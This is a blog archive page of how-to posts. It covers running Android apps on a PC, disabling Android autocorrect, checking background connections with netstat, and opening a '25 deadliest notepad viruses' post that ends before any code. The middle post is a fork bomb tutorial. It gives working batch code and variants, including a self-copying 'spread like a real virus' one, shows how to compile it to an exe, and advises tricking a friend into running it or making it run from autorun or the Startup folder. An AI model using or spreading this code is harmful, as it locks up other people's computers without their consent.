Showing posts with label how-to. Show all posts
Showing posts with label how-to. Show all posts

Sunday 24 May 2015

Run android on computer.

A disadvantage explosion development apps over the past years has been lack of innovation in the developer Pc. create software pc here for multiple purposes is guides step by step execution applications android on your computer. Many people think that there is no software to run and play the android on computer applicationToday will explain this in detail, that you can easily run these programs. You can run whatsapp for messaging and other applications. This app is free and legal because android is open source.

Step 1: Download software program called Blue stacks app player. Bluestack is available for windows Xp, 7,8 and 8.1..
Step 2: Install Bluestacks.
Step 3: Open the software and access google play store, Games etc

How To Turn Off Auto Correction In Android

However, if the word is misspelled not? The feature of AutoCorrect in Android can be useful sometimes, but it can also be an obstacle. It is easy to adjust the aggressiveness of the feature or to turn it off completely, and we'll show you how using a Nexus 7,running a stock Android system, using the standard keyboard of Google.

Swipe down from the right side of the status bar at the top of the screen. Touch the “Settings” button
On the “Settings” screen, touch “Language & input” in the “Personal” section.
In the “Keyboard & Input Methods” section of the “Language & input” screen, touch the Quick Settings icon to the right of the Google Keyboard.
The “Google Keyboard Settings” screen displays. Touch the “Auto-correction” option.
On the “Auto-correction” dialog box, select how aggressive you want the system to be when it checks and automatically corrects your spelling and typos. To completely turn off the auto-correction feature, touch the radio button to the right of “Off.” You are automatically returned to the “Google Keyboard Settings” screen.

Secret connections running in the background.

If your Internet connection has become slower than it should? There may be a chance that you have some malware, spyware or adware that uses your Internet connection in the background without your knowledge. Here's how to see what is happening under the hood.
It is worth noting that most third-party firewalls will give you probably the same type of information as well as block things that try to connect... unless managed applications add an exclusion alreadyBetter check anyway.

Open cmd on your windows computer and then type this command without quotes "netstat -abf 5 > activity.txt " and then wait for two minutes and then hold the ctrl key and the letter C that is ctrl+c.

Thursday 20 November 2014

Fork bomb {complete tutorial}

Picture of how to make a fork bomb exe
this will teach you how to make a harmless fork bomb program which will lock up a computer when run.

yes you can modify this to make a DOS error but im not going to be the idiot to tell you how

Step 1: Making the .bat

Picture of making the .bat
open up notepad and enter the following text:
start %0
goto :fork

save it as something.bat
to the desktop

there are about a million different ways to do this, i gave you disputably the best one, other variants include:

my favorite is the spread like a real virus bomb

explorer bomb:
start %0
start C:\Windows\explorer.exe
goto :e

program bomb:
start %0
start anyprogramyouwant
goto :e

the mini bomb:

inefficient bombs:
goto :e

start cmd.exe
goto :e

start (name of the batch file)
goto :e

slap in the face for deleting this bomb:
IF (DELETE whatever.bat) goto :e
IF (ERASE whatever.bat
start %0
goto :e

matrix bomb:
@echo off
color 0a
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% (lots of randoms)
start %0
goto :x

spread like a real virus bomb:
copy /Y %0 %random%.bat
start %0
goto :e

alphabet fork:
start %0
goto :a
start %0
goto :b
start %0
goto :c
start %0
goto :d
start %0
goto :e
start %0
goto :g
start %0
goto :i
start %0
goto :j
start %0
goto :k
start %0
goto :l
start %0
goto :m
start %0
goto :n
start %0
goto :o
start %0
goto :p
start %0
goto :q
start %0
goto :r
start %0
goto :s
start %0
goto :t
start %0
goto :u
start %0
goto :v
start %0
goto :w
start %0
goto :x
start %0
goto :y
start %0
goto :z
start %0
goto :bob

Step 2: Convert to exe

Picture of convert to exe
download bat to exe converter
extract it to the desktop and run it
chose your something.bat for the batchfile and an icon if you want
press compile
there should be a something.exe on your desktop

Step 3: Deploy

Picture of Deploy
now this can be run on any machine that runs exe's
you can trick a friend into running it once for fun, or you can use it with an autorun.ini on a cd to make it run as soon as its inserted
or you could be more deviant and make it run every time the user logs in, to do this just drag and drop it to the startup folder in the start menu

25 deadliest notepad viruses .

Here I am posting scripts which are used in creating a virus using
notepad. Some of them will works on windows xp and some of them in windows 7.

First thing you need to do is to open notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r run window will open and
type notepad and hit enter .

No 1:- 


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